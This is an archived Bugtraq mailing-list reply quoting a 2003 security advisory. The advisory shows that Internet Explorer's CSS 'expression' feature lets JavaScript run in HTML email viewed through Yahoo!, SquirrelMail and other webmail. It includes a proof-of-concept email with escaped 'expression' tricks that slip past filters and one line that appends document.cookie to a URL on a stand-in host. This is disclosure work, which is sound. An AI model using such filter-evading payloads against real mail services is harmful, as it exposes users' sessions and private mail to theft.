Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Webmails + Internet Explorer can create unwanted javascript execution

From: "Drew Copley" <dcopley () eeye com>
Date: Fri, 3 Oct 2003 10:19:23 -0700
Yahoo has a massive userbase (with good reason).

This kind of bug could potentially turn some IE security issues into a more
readily mail borne attack. This could be bad. Very bad.

I do not see that you have contacted Yahoo on this. 




-----Original Message-----
From: Jedi/Sector One [mailto:j () pureftpd org] 
Sent: Thursday, October 02, 2003 2:39 PM
To: bugtraq () securityfocus com
Subject: Webmails + Internet Explorer can create unwanted 
javascript execution




Summary : Multiple web-based mail systems browsed through 
Internet Explorer
          can allow arbitrary javascript execution.
Date    : 02/10/2003
Author  : Frank Denis <j () pureftpd org>


       ------------------------[ Description ]------------------------
       
  The issue described here doesn't reveal a vulnerability in 
a specific product. But the combination of features of 
Internet Explorer with features of common webmail software 
can create a vulnerability.

1) Internet Explorer interprets stylesheets for any HTML tag, 
even non-existent ones. For instance :

<xbody style="...">

  is not a valid tag, but attributes are evaluated.
  
  It may be considered as a bug or as a logical behavior, 
your mileage may vary. And this alone is not a security flaw.

2) Internet Explorer can evaluate Javascript expressions in 
style sheets through the "expression" keyword :

<style type="text/css">
a {
  width: expression(6 * 9 + 'px');  
}
</style>

  This is not a bug either, but a proprietary, properly 
documented extension.

3) Due to the increase of HTML-only email, most popular 
webmail software can display HTML email. In this context, 
Javascript _must_ be removed from every email. To achieve 
this result, various tricks are used by webmail software :

 - Removal or mangling of <script> tags,
 
 - Removal or mangling of "javascript:" urls.
 
 - Removal or mangling of properties like "onmouseover".
 

      ------------------------[ Vulnerability 
]------------------------

  By combining 2) with 3) and if the webmail doesn't filter 
out stylesheets nor the "expression" keyword, any Javascript 
contained in a message will be executed as soon as the 
recipient will display it.

  Some webmail software are aware of that issue for a while 
and they are mangling or filtering any occurrence of 
"expression". However, the mangling may not work when the 
name of the property is escaped (like "e\xpression") as CSS 
permits. Or it may not work in the context of 
non-existent-because- mangled tags. The former worked on 
Yahoo! until yesterday (the issue was fixed quickly after 
being reported, they are nice and reactive guys).

  But most software simply don't know about "expression". 
They are _not_ faulty, though. This is not a bug nor a 
vulnerability. "expression" is a proprietary extension. 
Webmails don't have to know about every possible implication 
of every proprietary extension of every version of every 
browser out there.

  However, when the following conditions are met, the 
Javascript is executed :
  
- "expression" keywords aren't filtered/mangled by the 
webmail software.

- The client software is Internet Explorer.

- Javascript isn't disabled in the client software. 
Unfortunately, a lot of public webmail systems simply don't 
work when Javascript is disabled.
 

       ------------------------[ Impact ]------------------------

  Depending on the webmail software, complete control of the 
client's session may be possible. Private mail can be deleted 
or bounced to evil addresses, cookies and session identifiers 
can be stolen, etc.


    ------------------------[ Proof of concept 
]------------------------
               
  Webmail software like to filter or mangle stylesheets. Some 
software totally remove everything inside <head>...</head> 
tags. Some software totally remove <body>...</body> tags 
(possibly killing style info by the way) instead of 
converting them to something like <div>...</div>. Some 
software totally remove <style>...</style> definitions but 
accept inline css. 
  This is bad, because it encourages people to send broken 
HTML 3 code instead of well-formed, accessible XHTML documents.
  The following HTML email tries to add workarounds for this 
kind of filters in order to test whether the "expression" 
keyword that properly gets evaluated on Internet Explorer. It 
currently works at least with IE 6 + Squirrelmail, Yahoo! and 
the software of a dozen public and ISP webmail services I 
have an account on.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
               "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd";>
<html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="fr"> <head>
  <title>Webmail test</title>
  <meta http-equiv="Content-Type" 
content="text/html;charset=ISO-8859-1" /> </head> <body 
style="width:&#x65;xpres\sion(alert(1))">
  <style type="text/css">
h1 {
  he\ight:&#x65;\xpression(alert(2));
  
bac\kground-image:&#x65;\xpression('url(http://example.org/'+d
ocument.cookie+$
}
  </style>
  <h1 style="width:&#x65;xpression(alert(3))">...</h1>
  <div id="just-for-fun">
    <a href="&#x6A;avascript:window.open(document.location);"
       onmouseover="alert(4)">fireworks</a>
  </div>
</body>
</html>


         ------------------------[ Fix ]------------------------

  For the end user, there are four ways to avoid this issue :
  
 - Don't use Internet Explorer to connect to webmails.
or/and
 - Disable Javascript.
or/and
 - Configure the webmail to only display mails as plain text. or/and 
 - Only connect to webmails when you are 100% sure the 
software it is powered by completely filters or mangles 
"expression" keywords and hope that software and the version 
won't change silently.


--
 __  /*-      Frank DENIS (Jedi/Sector One) 
<j () 42-Networks Com>     -*\  __
 \ '/    <a href="http://www.PureFTPd.Org/";> Secure FTP 
Server </a>    \' /
  \/  <a href="http://www.Jedi.Claranet.Fr/";> Misc. free 
software </a>  \/
Previous By Date Next
Previous By Thread Next

Current thread: